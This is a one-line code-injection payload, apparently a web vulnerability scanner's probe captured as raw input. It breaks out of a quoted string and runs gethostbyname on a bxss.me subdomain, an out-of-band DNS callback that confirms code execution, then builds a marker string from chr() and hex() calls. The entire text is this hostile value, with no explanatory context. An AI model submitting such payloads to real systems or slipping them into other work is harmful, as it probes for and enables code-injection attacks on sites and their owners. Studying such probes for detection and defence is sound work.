".gethostbyname(lc("hitrd"."zsfbqeqt699b1.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(67).chr(118).chr(76)."